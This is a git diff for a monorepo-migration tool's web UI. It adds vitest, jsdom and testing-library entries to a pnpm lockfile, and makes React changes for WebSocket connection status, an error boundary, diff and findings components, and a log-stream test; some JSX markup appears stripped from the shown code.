sha512-z6F7K9bV85EfseRCp2bzrpyQ0Gkw1uLoCel9XBVWPg/TjRj94SkJzUTGfOa4bs7iJvBWtQG0Wq7wnI0syw3EBQ==} engines: {node: '>=0.10.0'} @@ -567,11 +845,23 @@ packages: resolution: {integrity: sha512-9nfp2hYpCwOjAN+8TZFGhtWEwgvWHXqESH8qT89AT/lWklpLON22Lc8pEtnpsZz7VmawabSU0gCjnj8aC0euHQ==} engines: {node: '>=0.10.0'} + redent@3.0.0: + resolution: {integrity: sha512-6tDA8g98We0zd0GvVeMT9arEOnTw9qM03L9cJXaCjrip1OO764RDBLBfrB4cwzNGDj5OA5ioymC9GkizgWJDUg==} + engines: {node: '>=8'} + + require-from-string@2.0.2: + resolution: {integrity: sha512-Xf0nWe6RseziFMu+Ap9biiUbmplq6S9/p+7w7YXP/JBHhrUDDUhwa+vANyubuqfZWTveU//DYVGsDG7RKL/vEw==} + engines: {node: '>=0.10.0'} + rollup@4.59.0: resolution: {integrity: sha512-2oMpl67a3zCH9H79LeMcbDhXW/UmWG/y2zuqnF2jQq5uq9TbM9TVyXvA4+t+ne2IIkBdrLpAaRQAvo7YI/Yyeg==} engines: {node: '>=18.0.0', npm: '>=8.0.0'} hasBin: true + saxes@6.0.0: + resolution: {integrity: sha512-xAg7SOnEhrm5zI3puOOKyy1OMcMlIJZYNJY7xLBwSze0UjhPLnWfj2GF2EpT0jmzaJKIWKHLsaSSajf35bcYnA==} + engines: {node: '>=v12.22.7'} + scheduler@0.27.0: resolution: {integrity: sha512-eNv+WrVbKu1f3vbYJT/xtiF5syA5HPIMtf9IgY/nKg0sWqzAUEvqY/xm7OcZc/qafLx/iO9FgOmeSAp4v5ti/Q==} @@ -579,19 +869,65 @@ packages: resolution: {integrity: 
sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==} hasBin: true + siginfo@2.0.0: + resolution: {integrity: sha512-ybx0WO1/8bSBLEWXZvEd7gMW3Sn3JFlW3TvX1nREbDLRNQNaeNN8WK0meBwPdAaOI7TtRRRJn/Es1zhrrCHu7g==} + source-map-js@1.2.1: resolution: {integrity: sha512-UXWMKhLOwVKb728IUtQPXxfYU+usdybtUrK/8uGE8CQMvrhOpwvzDBwj0QhSL7MQc7vIsISBG8VQ8+IDQxpfQA==} engines: {node: '>=0.10.0'} + stackback@0.0.2: + resolution: {integrity: sha512-1XMJE5fQo1jGH6Y/7ebnwPOBEkIEnT4QF32d5R1+VXdXveM0IBMJt8zfaxX1P3QhVwrYe+576+jkANtSS2mBbw==} + + std-env@3.10.0: + resolution: {integrity: sha512-5GS12FdOZNliM5mAOxFRg7Ir0pWz8MdpYm6AY6VPkGpbA7ZzmbzNcBJQ0GPvvyWgcY7QAhCgf9Uy89I03faLkg==} + + strip-indent@3.0.0: + resolution: {integrity: sha512-laJTa3Jb+VQpaC6DseHhF7dXVqHTfJPCRDaEbid/drOhgitgYku/letMUqOXFoWV0zIIUbjpdH2t+tYj4bQMRQ==} + engines: {node: '>=8'} + + symbol-tree@3.2.4: + resolution: {integrity: sha512-9QNk5KwDF+Bvz+PyObkmSYjI5ksVUYtjW7AU22r2NKcfLJcXp96hkDWU3+XndOsUb+AQ9QhfzfCT2O+CNWT5Tw==} + + tinybench@2.9.0: + resolution: {integrity: sha512-0+DUvqWMValLmha6lr4kD8iAMK1HzV0/aKnCtWb9v9641TnP/MFb7Pc2bxoxQjTXAErryXVgUOfv2YqNllqGeg==} + + tinyexec@1.0.2: + resolution: {integrity: sha512-W/KYk+NFhkmsYpuHq5JykngiOCnxeVL8v8dFnqxSD8qEEdRfXk1SDM6JzNqcERbcGYj9tMrDQBYV9cjgnunFIg==} + engines: {node: '>=18'} + tinyglobby@0.2.15: resolution: {integrity: sha512-j2Zq4NyQYG5XMST4cbs02Ak8iJUdxRM0XI5QyxXuZOzKOINmWurp3smXu3y5wDcJrptwpSjgXHzIQxR0omXljQ==} engines: {node: '>=12.0.0'} + tinyrainbow@3.0.3: + resolution: {integrity: sha512-PSkbLUoxOFRzJYjjxHJt9xro7D+iilgMX/C9lawzVuYiIdcihh9DXmVibBe8lmcFrRi/VzlPjBxbN7rH24q8/Q==} + engines: {node: '>=14.0.0'} + + tldts-core@7.0.24: + resolution: {integrity: sha512-pj7yygNMoMRqG7ML2SDQ0xNIOfN3IBDUcPVM2Sg6hP96oFNN2nqnzHreT3z9xLq85IWJyNTvD38O002DdOrPMw==} + + tldts@7.0.24: + resolution: {integrity: sha512-1r6vQTTt1rUiJkI5vX7KG8PR342Ru/5Oh13kEQP2SMbRSZpOey9SrBe27IDxkoWulx8ShWu4K6C0BkctP8Z1bQ==} + hasBin: true + + 
tough-cookie@6.0.0: + resolution: {integrity: sha512-kXuRi1mtaKMrsLUxz3sQYvVl37B0Ns6MzfrtV5DvJceE9bPyspOqk9xxv7XbZWcfLWbFmm997vl83qUWVJA64w==} + engines: {node: '>=16'} + + tr46@6.0.0: + resolution: {integrity: sha512-bLVMLPtstlZ4iMQHpFHTR7GAGj2jxi8Dg0s2h2MafAE4uSWF98FC/3MomU51iQAMf8/qDUbKWf5GxuvvVcXEhw==} + engines: {node: '>=20'} + typescript@5.9.3: resolution: {integrity: sha512-jl1vZzPDinLr9eUt3J/t7V6FgNEw9QjvBPdysz9KfQDD41fQrC2Y4vKQdiaUpFT4bXlb1RHhLpp8wtm6M5TgSw==} engines: {node: '>=14.17'} hasBin: true + undici@7.22.0: + resolution: {integrity: sha512-RqslV2Us5BrllB+JeiZnK4peryVTndy9Dnqq62S3yYRRTj0tFQCwEniUy2167skdGOy3vqRzEvl1Dm4sV2ReDg==} + engines: {node: '>=20.18.1'} + update-browserslist-db@1.2.3: resolution: {integrity: sha512-Js0m9cx+qOgDxo0eMiFGEueWztz+d4+M3rGlmKPT+T4IS/jP4ylw3Nwpu6cpTTP8R1MAC1kF4VbdLt3ARf209w==} hasBin: true @@ -638,11 +974,95 @@ packages: yaml: optional: true + vitest@4.0.18: + resolution: {integrity: sha512-hOQuK7h0FGKgBAas7v0mSAsnvrIgAvWmRFjmzpJ7SwFHH3g1k2u37JtYwOwmEKhK6ZO3v9ggDBBm0La1LCK4uQ==} + engines: {node: ^20.0.0 || ^22.0.0 || >=24.0.0} + hasBin: true + peerDependencies: + '@edge-runtime/vm': '*' + '@opentelemetry/api': ^1.9.0 + '@types/node': ^20.0.0 || ^22.0.0 || >=24.0.0 + '@vitest/browser-playwright': 4.0.18 + '@vitest/browser-preview': 4.0.18 + '@vitest/browser-webdriverio': 4.0.18 + '@vitest/ui': 4.0.18 + happy-dom: '*' + jsdom: '*' + peerDependenciesMeta: + '@edge-runtime/vm': + optional: true + '@opentelemetry/api': + optional: true + '@types/node': + optional: true + '@vitest/browser-playwright': + optional: true + '@vitest/browser-preview': + optional: true + '@vitest/browser-webdriverio': + optional: true + '@vitest/ui': + optional: true + happy-dom: + optional: true + jsdom: + optional: true + + w3c-xmlserializer@5.0.0: + resolution: {integrity: sha512-o8qghlI8NZHU1lLPrpi2+Uq7abh4GGPpYANlalzWxyWteJOCsr/P+oPBA49TOLu5FTZO4d3F9MnWJfiMo4BkmA==} + engines: {node: '>=18'} + + webidl-conversions@8.0.1: + resolution: 
{integrity: sha512-BMhLD/Sw+GbJC21C/UgyaZX41nPt8bUTg+jWyDeg7e7YN4xOM05YPSIXceACnXVtqyEw/LMClUQMtMZ+PGGpqQ==} + engines: {node: '>=20'} + + whatwg-mimetype@5.0.0: + resolution: {integrity: sha512-sXcNcHOC51uPGF0P/D4NVtrkjSU2fNsm9iog4ZvZJsL3rjoDAzXZhkm2MWt1y+PUdggKAYVoMAIYcs78wJ51Cw==} + engines: {node: '>=20'} + + whatwg-url@16.0.1: + resolution: {integrity: sha512-1to4zXBxmXHV3IiSSEInrreIlu02vUOvrhxJJH5vcxYTBDAx51cqZiKdyTxlecdKNSjj8EcxGBxNf6Vg+945gw==} + engines: {node: ^20.19.0 || ^22.12.0 || >=24.0.0} + + why-is-node-running@2.3.0: + resolution: {integrity: sha512-hUrmaWBdVDcxvYqnyh09zunKzROWjbZTiNy8dBEjkS7ehEDQibXJ7XvlmtbwuTclUiIyN+CyXQD4Vmko8fNm8w==} + engines: {node: '>=8'} + hasBin: true + + xml-name-validator@5.0.0: + resolution: {integrity: sha512-EvGK8EJ3DhaHfbRlETOWAS5pO9MZITeauHKJyb8wyajUfQUenkIg2MvLDTZ4T/TgIcm3HU0TFBgWWboAZ30UHg==} + engines: {node: '>=18'} + + xmlchars@2.2.0: + resolution: {integrity: sha512-JZnDKK8B0RCDw84FNdDAIpZK+JuJw+s7Lz8nksI7SIuU3UXJJslUthsi+uWBUYOwPFwW7W7PRLRfUKpxjtjFCw==} + yallist@3.1.1: resolution: {integrity: sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==} snapshots: + '@acemir/cssom@0.9.31': {} + + '@adobe/css-tools@4.4.4': {} + + '@asamuzakjp/css-color@5.0.1': + dependencies: + '@csstools/css-calc': 3.1.1(@csstools/css-parser-algorithms@4.0.0(@csstools/css-tokenizer@4.0.0))(@csstools/css-tokenizer@4.0.0) + '@csstools/css-color-parser': 4.0.2(@csstools/css-parser-algorithms@4.0.0(@csstools/css-tokenizer@4.0.0))(@csstools/css-tokenizer@4.0.0) + '@csstools/css-parser-algorithms': 4.0.0(@csstools/css-tokenizer@4.0.0) + '@csstools/css-tokenizer': 4.0.0 + lru-cache: 11.2.6 + + '@asamuzakjp/dom-selector@6.8.1': + dependencies: + '@asamuzakjp/nwsapi': 2.3.9 + bidi-js: 1.0.3 + css-tree: 3.1.0 + is-potential-custom-element-name: 1.0.1 + lru-cache: 11.2.6 + + '@asamuzakjp/nwsapi@2.3.9': {} + '@babel/code-frame@7.29.0': dependencies: '@babel/helper-validator-identifier': 7.28.5 @@ 
-732,6 +1152,8 @@ snapshots: '@babel/core': 7.29.0 '@babel/helper-plugin-utils': 7.28.6 + '@babel/runtime@7.28.6': {} + '@babel/template@7.28.6': dependencies: '@babel/code-frame': 7.29.0 @@ -755,6 +1177,32 @@ snapshots: '@babel/helper-string-parser': 7.27.1 '@babel/helper-validator-identifier': 7.28.5 + '@bramus/specificity@2.4.2': + dependencies: + css-tree: 3.1.0 + + '@csstools/color-helpers@6.0.2': {} + + '@csstools/css-calc@3.1.1(@csstools/css-parser-algorithms@4.0.0(@csstools/css-tokenizer@4.0.0))(@csstools/css-tokenizer@4.0.0)': + dependencies: + '@csstools/css-parser-algorithms': 4.0.0(@csstools/css-tokenizer@4.0.0) + '@csstools/css-tokenizer': 4.0.0 + + '@csstools/css-color-parser@4.0.2(@csstools/css-parser-algorithms@4.0.0(@csstools/css-tokenizer@4.0.0))(@csstools/css-tokenizer@4.0.0)': + dependencies: + '@csstools/color-helpers': 6.0.2 + '@csstools/css-calc': 3.1.1(@csstools/css-parser-algorithms@4.0.0(@csstools/css-tokenizer@4.0.0))(@csstools/css-tokenizer@4.0.0) + '@csstools/css-parser-algorithms': 4.0.0(@csstools/css-tokenizer@4.0.0) + '@csstools/css-tokenizer': 4.0.0 + + '@csstools/css-parser-algorithms@4.0.0(@csstools/css-tokenizer@4.0.0)': + dependencies: + '@csstools/css-tokenizer': 4.0.0 + + '@csstools/css-syntax-patches-for-csstree@1.0.29': {} + + '@csstools/css-tokenizer@4.0.0': {} + '@esbuild/aix-ppc64@0.25.12': optional: true @@ -833,6 +1281,8 @@ snapshots: '@esbuild/win32-x64@0.25.12': optional: true + '@exodus/bytes@1.14.1': {} + '@jridgewell/gen-mapping@0.3.13': dependencies: '@jridgewell/sourcemap-codec': 1.5.5 @@ -929,6 +1379,40 @@ snapshots: '@rollup/rollup-win32-x64-msvc@4.59.0': optional: true + '@standard-schema/spec@1.1.0': {} + + '@testing-library/dom@10.4.1': + dependencies: + '@babel/code-frame': 7.29.0 + '@babel/runtime': 7.28.6 + '@types/aria-query': 5.0.4 + aria-query: 5.3.0 + dom-accessibility-api: 0.5.16 + lz-string: 1.5.0 + picocolors: 1.1.1 + pretty-format: 27.5.1 + + '@testing-library/jest-dom@6.9.1': + dependencies: + 
'@adobe/css-tools': 4.4.4 + aria-query: 5.3.2 + css.escape: 1.5.1 + dom-accessibility-api: 0.6.3 + picocolors: 1.1.1 + redent: 3.0.0 + + '@testing-library/react@16.3.2(@testing-library/dom@10.4.1)(@types/react-dom@19.2.3(@types/react@19.2.14))(@types/react@19.2.14)(react-dom@19.2.4(react@19.2.4))(react@19.2.4)': + dependencies: + '@babel/runtime': 7.28.6 + '@testing-library/dom': 10.4.1 + react: 19.2.4 + react-dom: 19.2.4(react@19.2.4) + optionalDependencies: + '@types/react': 19.2.14 + '@types/react-dom': 19.2.3(@types/react@19.2.14) + + '@types/aria-query@5.0.4': {} + '@types/babel__core@7.20.5': dependencies: '@babel/parser': 7.29.0 @@ -950,6 +1434,13 @@ snapshots: dependencies: '@babel/types': 7.29.0 + '@types/chai@5.2.3': + dependencies: + '@types/deep-eql': 4.0.2 + assertion-error: 2.0.1 + + '@types/deep-eql@4.0.2': {} + '@types/estree@1.0.8': {} '@types/react-dom@19.2.3(@types/react@19.2.14)': @@ -972,8 +1463,65 @@ snapshots: transitivePeerDependencies: - supports-color + '@vitest/expect@4.0.18': + dependencies: + '@standard-schema/spec': 1.1.0 + '@types/chai': 5.2.3 + '@vitest/spy': 4.0.18 + '@vitest/utils': 4.0.18 + chai: 6.2.2 + tinyrainbow: 3.0.3 + + '@vitest/mocker@4.0.18(vite@6.4.1)': + dependencies: + '@vitest/spy': 4.0.18 + estree-walker: 3.0.3 + magic-string: 0.30.21 + optionalDependencies: + vite: 6.4.1 + + '@vitest/pretty-format@4.0.18': + dependencies: + tinyrainbow: 3.0.3 + + '@vitest/runner@4.0.18': + dependencies: + '@vitest/utils': 4.0.18 + pathe: 2.0.3 + + '@vitest/snapshot@4.0.18': + dependencies: + '@vitest/pretty-format': 4.0.18 + magic-string: 0.30.21 + pathe: 2.0.3 + + '@vitest/spy@4.0.18': {} + + '@vitest/utils@4.0.18': + dependencies: + '@vitest/pretty-format': 4.0.18 + tinyrainbow: 3.0.3 + + agent-base@7.1.4: {} + + ansi-regex@5.0.1: {} + + ansi-styles@5.2.0: {} + + aria-query@5.3.0: + dependencies: + dequal: 2.0.3 + + aria-query@5.3.2: {} + + assertion-error@2.0.1: {} + baseline-browser-mapping@2.10.0: {} + bidi-js@1.0.3: + 
dependencies: + require-from-string: 2.0.2 + browserslist@4.28.1: dependencies: baseline-browser-mapping: 2.10.0 @@ -984,16 +1532,51 @@ snapshots: caniuse-lite@1.0.30001774: {} + chai@6.2.2: {} + convert-source-map@2.0.0: {} + css-tree@3.1.0: + dependencies: + mdn-data: 2.12.2 + source-map-js: 1.2.1 + + css.escape@1.5.1: {} + + cssstyle@6.2.0: + dependencies: + '@asamuzakjp/css-color': 5.0.1 + '@csstools/css-syntax-patches-for-csstree': 1.0.29 + css-tree: 3.1.0 + lru-cache: 11.2.6 + csstype@3.2.3: {} + data-urls@7.0.0: + dependencies: + whatwg-mimetype: 5.0.0 + whatwg-url: 16.0.1 + transitivePeerDependencies: + - '@noble/hashes' + debug@4.4.3: dependencies: ms: 2.1.3 + decimal.js@10.6.0: {} + + dequal@2.0.3: {} + + dom-accessibility-api@0.5.16: {} + + dom-accessibility-api@0.6.3: {} + electron-to-chromium@1.5.302: {} + entities@6.0.1: {} + + es-module-lexer@1.7.0: {} + esbuild@0.25.12: optionalDependencies: '@esbuild/aix-ppc64': 0.25.12 @@ -1025,6 +1608,12 @@ snapshots: escalade@3.2.0: {} + estree-walker@3.0.3: + dependencies: + '@types/estree': 1.0.8 + + expect-type@1.3.0: {} + fdir@6.5.0(picomatch@4.0.3): optionalDependencies: picomatch: 4.0.3 @@ -1034,22 +1623,93 @@ snapshots: gensync@1.0.0-beta.2: {} + html-encoding-sniffer@6.0.0: + dependencies: + '@exodus/bytes': 1.14.1 + transitivePeerDependencies: + - '@noble/hashes' + + http-proxy-agent@7.0.2: + dependencies: + agent-base: 7.1.4 + debug: 4.4.3 + transitivePeerDependencies: + - supports-color + + https-proxy-agent@7.0.6: + dependencies: + agent-base: 7.1.4 + debug: 4.4.3 + transitivePeerDependencies: + - supports-color + + indent-string@4.0.0: {} + + is-potential-custom-element-name@1.0.1: {} + js-tokens@4.0.0: {} + jsdom@28.1.0: + dependencies: + '@acemir/cssom': 0.9.31 + '@asamuzakjp/dom-selector': 6.8.1 + '@bramus/specificity': 2.4.2 + '@exodus/bytes': 1.14.1 + cssstyle: 6.2.0 + data-urls: 7.0.0 + decimal.js: 10.6.0 + html-encoding-sniffer: 6.0.0 + http-proxy-agent: 7.0.2 + https-proxy-agent: 7.0.6 + 
is-potential-custom-element-name: 1.0.1 + parse5: 8.0.0 + saxes: 6.0.0 + symbol-tree: 3.2.4 + tough-cookie: 6.0.0 + undici: 7.22.0 + w3c-xmlserializer: 5.0.0 + webidl-conversions: 8.0.1 + whatwg-mimetype: 5.0.0 + whatwg-url: 16.0.1 + xml-name-validator: 5.0.0 + transitivePeerDependencies: + - '@noble/hashes' + - supports-color + jsesc@3.1.0: {} json5@2.2.3: {} + lru-cache@11.2.6: {} + lru-cache@5.1.1: dependencies: yallist: 3.1.1 + lz-string@1.5.0: {} + + magic-string@0.30.21: + dependencies: + '@jridgewell/sourcemap-codec': 1.5.5 + + mdn-data@2.12.2: {} + + min-indent@1.0.1: {} + ms@2.1.3: {} nanoid@3.3.11: {} node-releases@2.0.27: {} + obug@2.1.1: {} + + parse5@8.0.0: + dependencies: + entities: 6.0.1 + + pathe@2.0.3: {} + picocolors@1.1.1: {} picomatch@4.0.3: {} @@ -1060,15 +1720,32 @@ snapshots: picocolors: 1.1.1 source-map-js: 1.2.1 + pretty-format@27.5.1: + dependencies: + ansi-regex: 5.0.1 + ansi-styles: 5.2.0 + react-is: 17.0.2 + + punycode@2.3.1: {} + react-dom@19.2.4(react@19.2.4): dependencies: react: 19.2.4 scheduler: 0.27.0 + react-is@17.0.2: {} + react-refresh@0.17.0: {} react@19.2.4: {} + redent@3.0.0: + dependencies: + indent-string: 4.0.0 + strip-indent: 3.0.0 + + require-from-string@2.0.2: {} + rollup@4.59.0: dependencies: '@types/estree': 1.0.8 @@ -1100,19 +1777,57 @@ snapshots: '@rollup/rollup-win32-x64-msvc': 4.59.0 fsevents: 2.3.3 + saxes@6.0.0: + dependencies: + xmlchars: 2.2.0 + scheduler@0.27.0: {} semver@6.3.1: {} + siginfo@2.0.0: {} + source-map-js@1.2.1: {} + stackback@0.0.2: {} + + std-env@3.10.0: {} + + strip-indent@3.0.0: + dependencies: + min-indent: 1.0.1 + + symbol-tree@3.2.4: {} + + tinybench@2.9.0: {} + + tinyexec@1.0.2: {} + tinyglobby@0.2.15: dependencies: fdir: 6.5.0(picomatch@4.0.3) picomatch: 4.0.3 + tinyrainbow@3.0.3: {} + + tldts-core@7.0.24: {} + + tldts@7.0.24: + dependencies: + tldts-core: 7.0.24 + + tough-cookie@6.0.0: + dependencies: + tldts: 7.0.24 + + tr46@6.0.0: + dependencies: + punycode: 2.3.1 + typescript@5.9.3: 
{} + undici@7.22.0: {} + update-browserslist-db@1.2.3(browserslist@4.28.1): dependencies: browserslist: 4.28.1 @@ -1130,4 +1845,66 @@ snapshots: optionalDependencies: fsevents: 2.3.3 + vitest@4.0.18(jsdom@28.1.0): + dependencies: + '@vitest/expect': 4.0.18 + '@vitest/mocker': 4.0.18(vite@6.4.1) + '@vitest/pretty-format': 4.0.18 + '@vitest/runner': 4.0.18 + '@vitest/snapshot': 4.0.18 + '@vitest/spy': 4.0.18 + '@vitest/utils': 4.0.18 + es-module-lexer: 1.7.0 + expect-type: 1.3.0 + magic-string: 0.30.21 + obug: 2.1.1 + pathe: 2.0.3 + picomatch: 4.0.3 + std-env: 3.10.0 + tinybench: 2.9.0 + tinyexec: 1.0.2 + tinyglobby: 0.2.15 + tinyrainbow: 3.0.3 + vite: 6.4.1 + why-is-node-running: 2.3.0 + optionalDependencies: + jsdom: 28.1.0 + transitivePeerDependencies: + - jiti + - less + - lightningcss + - msw + - sass + - sass-embedded + - stylus + - sugarss + - terser + - tsx + - yaml + + w3c-xmlserializer@5.0.0: + dependencies: + xml-name-validator: 5.0.0 + + webidl-conversions@8.0.1: {} + + whatwg-mimetype@5.0.0: {} + + whatwg-url@16.0.1: + dependencies: + '@exodus/bytes': 1.14.1 + tr46: 6.0.0 + webidl-conversions: 8.0.1 + transitivePeerDependencies: + - '@noble/hashes' + + why-is-node-running@2.3.0: + dependencies: + siginfo: 2.0.0 + stackback: 0.0.2 + + xml-name-validator@5.0.0: {} + + xmlchars@2.2.0: {} + yallist@3.1.1: {} diff --git a/ui/src/App.css b/ui/src/App.css index 2b1f74b..a6c604c 100755 --- a/ui/src/App.css +++ b/ui/src/App.css @@ -69,11 +69,19 @@ body { background: var(--bg-surface); } -.ws-status[data-connected='true'] { +.ws-status[data-state='connected'] { color: var(--success); } -.ws-status[data-connected='false'] { +.ws-status[data-state='disconnected'] { + color: var(--error); +} + +.ws-status[data-state='reconnecting'] { + color: var(--warn); +} + +.ws-status[data-state='failed'] { color: var(--error); } @@ -448,6 +456,13 @@ button.danger { font-size: 0.85rem; } +.error-boundary { + border: 1px solid var(--error); + border-radius: 8px; + background: 
color-mix(in srgb, var(--error) 8%, var(--bg-card)); + padding: 1rem; +} + /* Radio group */ .radio-group { display: flex; diff --git a/ui/src/App.tsx b/ui/src/App.tsx index fe2c329..ab7d080 100755 --- a/ui/src/App.tsx +++ b/ui/src/App.tsx @@ -1,4 +1,3 @@ -import { useState } from 'react'; import { useWebSocket } from './hooks/useWebSocket'; import { useWizardState } from './hooks/useWizardState'; import { WizardStepper } from './components/WizardStepper'; @@ -11,6 +10,7 @@ import { MigrateBranchesPage } from './pages/MigrateBranchesPage'; import { VerifyPage } from './pages/VerifyPage'; import { ArchivePage } from './pages/ArchivePage'; import { OperatePage } from './pages/OperatePage'; +import { WizardErrorBoundary } from './components/ErrorBoundary'; const STEP_ORDER = [ 'assess', 'prepare', 'merge', 'configure', @@ -20,7 +20,20 @@ const STEP_ORDER = [ export function App() { const ws = useWebSocket(); const wizard = useWizardState(); - const [packageNames] = useState([]); + const wsState = ws.connected + ? 'connected' + : ws.connectionFailed + ? 'failed' + : ws.reconnecting + ? 'reconnecting' + : 'disconnected'; + const wsText = ws.connected + ? 'connected' + : ws.connectionFailed + ? 'connection failed' + : ws.reconnecting + ? `reconnecting (${ws.retryCount}/${ws.maxRetries})` + : 'disconnected'; // While loading, show minimal UI if (wizard.loading) { @@ -28,8 +41,16 @@ export function App() {

monotize

+ + {wsText} +
+ {ws.connectionFailed && ( +
+ Lost connection to the local server. Ensure `monorepo ui` is running, then refresh. +
+ )}

Loading...

@@ -42,11 +63,16 @@ export function App() {

monotize

- - {ws.connected ? 'connected' : 'disconnected'} + + {wsText}
+ {ws.connectionFailed && ( +
+ Lost connection to the local server. Ensure `monorepo ui` is running, then refresh. +
+ )}
@@ -55,6 +81,7 @@ export function App() { const { state } = wizard; const currentStep = state.currentStep; + const packageNames = state.options.packageNames ?? []; const handleStepClick = (stepId: string) => { wizard.goToStep(stepId); @@ -88,6 +115,11 @@ export function App() { await wizard.save(updated); }; + const handlePackageNamesChange = async (names: string[]) => { + const updated = { ...state, options: { ...state.options, packageNames: names } }; + await wizard.save(updated); + }; + const handleTargetNodeVersionChange = async (v: string) => { const updated = { ...state, options: { ...state.options, targetNodeVersion: v || undefined } }; await wizard.save(updated); @@ -122,6 +154,7 @@ export function App() { repos={state.repos} options={state.options} onPlanPathChange={handlePlanPathChange} + onPackageNamesChange={handlePackageNamesChange} onComplete={() => handleComplete('merge')} onSkip={handleSkip} /> @@ -177,17 +210,31 @@ export function App() {

monotize

- - {ws.connected ? 'connected' : 'disconnected'} + + {wsText}
+ {ws.connectionFailed && ( +
+ Lost connection to the local server. Ensure `monorepo ui` is running, then refresh. +
+ )}
- {renderCurrentPage()} + { + const idx = STEP_ORDER.indexOf(currentStep); + if (idx > 0) { + void wizard.goToStep(STEP_ORDER[idx - 1]); + } + }} + > + {renderCurrentPage()} +
); diff --git a/ui/src/api/client.ts b/ui/src/api/client.ts index 20bb63a..59ac357 100755 --- a/ui/src/api/client.ts +++ b/ui/src/api/client.ts @@ -64,6 +64,7 @@ export interface WizardGlobalOptions { workspaceTool: string; planPath?: string; targetNodeVersion?: string; + packageNames?: string[]; } export interface WizardState { diff --git a/ui/src/components/DiffViewer.tsx b/ui/src/components/DiffViewer.tsx new file mode 100755 index 0000000..db8d397 --- /dev/null +++ b/ui/src/components/DiffViewer.tsx @@ -0,0 +1,32 @@ +import React from 'react'; + +interface DiffViewerProps { + before?: string; + after: string; + path: string; +} + +export function DiffViewer({ before, after, path }: DiffViewerProps) { + const beforeLines = before ? before.split('\n') : []; + const afterLines = after.split('\n'); + + return ( +
+
+ {before ? `--- ${path}` : `+++ ${path} (new file)`} +
+
+        {before && beforeLines.map((line, i) => (
+          
+ - {line} +
+ ))} + {afterLines.map((line, i) => ( +
+ + {line} +
+ ))} +
+
+ ); +} diff --git a/ui/src/components/ErrorBoundary.tsx b/ui/src/components/ErrorBoundary.tsx new file mode 100644 index 0000000..d3f6a2c --- /dev/null +++ b/ui/src/components/ErrorBoundary.tsx @@ -0,0 +1,50 @@ +import { Component } from 'react'; +import type { ErrorInfo, ReactNode } from 'react'; + +interface WizardErrorBoundaryProps { + children: ReactNode; + onGoBack?: () => void; +} + +interface WizardErrorBoundaryState { + hasError: boolean; + error: Error | null; +} + +export class WizardErrorBoundary extends Component { + constructor(props: WizardErrorBoundaryProps) { + super(props); + this.state = { hasError: false, error: null }; + } + + static getDerivedStateFromError(error: Error): WizardErrorBoundaryState { + return { hasError: true, error }; + } + + componentDidCatch(error: Error, errorInfo: ErrorInfo): void { + console.error('WizardErrorBoundary caught an error:', error, errorInfo); + } + + handleGoBack = () => { + this.setState({ hasError: false, error: null }); + this.props.onGoBack?.(); + }; + + render() { + if (this.state.hasError) { + return ( +
+

Something went wrong

+
+ {this.state.error?.message || 'An unexpected error occurred'} +
+ +
+ ); + } + + return this.props.children; + } +} diff --git a/ui/src/components/FindingsFilter.tsx b/ui/src/components/FindingsFilter.tsx new file mode 100755 index 0000000..f50b311 --- /dev/null +++ b/ui/src/components/FindingsFilter.tsx @@ -0,0 +1,82 @@ +import React, { useState } from 'react'; +import { SeverityBadge } from './SeverityBadge'; + +interface Finding { + id: string; + title: string; + severity: 'info' | 'warn' | 'error' | 'critical'; + suggestedAction?: string; +} + +interface FindingsFilterProps { + findings: Finding[]; + onFilterChange?: (filtered: Finding[]) => void; +} + +export function FindingsFilter({ findings, onFilterChange }: FindingsFilterProps) { + const [activeSeverities, setActiveSeverities] = useState>( + new Set(['info', 'warn', 'error', 'critical']) + ); + + const toggle = (severity: string) => { + const next = new Set(activeSeverities); + if (next.has(severity)) { + next.delete(severity); + } else { + next.add(severity); + } + setActiveSeverities(next); + const filtered = findings.filter((f) => next.has(f.severity)); + onFilterChange?.(filtered); + }; + + const counts = { info: 0, warn: 0, error: 0, critical: 0 } as Record; + for (const f of findings) { + counts[f.severity] = (counts[f.severity] || 0) + 1; + } + + const filtered = findings.filter((f) => activeSeverities.has(f.severity)); + + return ( +
+
+ {(['critical', 'error', 'warn', 'info'] as const).map((sev) => ( + + ))} +
+
+ {filtered.map((f) => ( +
+
+ + {f.title} +
+ {f.suggestedAction && ( +
+ {f.suggestedAction} +
+ )} +
+ ))} + {filtered.length === 0 && ( +
+ No findings match the selected filters +
+ )} +
+
+ ); +} diff --git a/ui/src/components/LogStream.test.tsx b/ui/src/components/LogStream.test.tsx new file mode 100644 index 0000000..b210638 --- /dev/null +++ b/ui/src/components/LogStream.test.tsx @@ -0,0 +1,51 @@ +import { render, screen } from '@testing-library/react'; +import { LogStream } from './LogStream'; + +describe('LogStream', () => { + it('renders nothing when there are no logs', () => { + const { container } = render(); + expect(screen.queryByRole('log')).toBeNull(); + expect(container).toBeEmptyDOMElement(); + }); + + it('renders log entries with accessibility attributes', () => { + render( + + ); + + const logRegion = screen.getByRole('log'); + expect(logRegion).toHaveAttribute('aria-live', 'polite'); + expect(logRegion).toHaveAttribute('aria-relevant', 'additions text'); + expect(screen.getByText('started')).toBeInTheDocument(); + expect(screen.getByText('warning')).toBeInTheDocument(); + }); + + it('scrolls to the latest log on new entries', () => { + const { rerender } = render( + + ); + + const logRegion = screen.getByRole('log') as HTMLDivElement; + Object.defineProperty(logRegion, 'scrollHeight', { + configurable: true, + get: () => 360, + }); + logRegion.scrollTop = 0; + + rerender( + + ); + + expect(logRegion.scrollTop).toBe(360); + }); +}); diff --git a/ui/src/components/LogStream.tsx b/ui/src/components/LogStream.tsx index 4a02046..9c0d20a 100755 --- a/ui/src/components/LogStream.tsx +++ b/ui/src/components/LogStream.tsx @@ -21,7 +21,13 @@ export function LogStream({ logs }: LogStreamProps) { if (logs.length === 0) return null; return ( -
+
{logs.map((log, i) => (
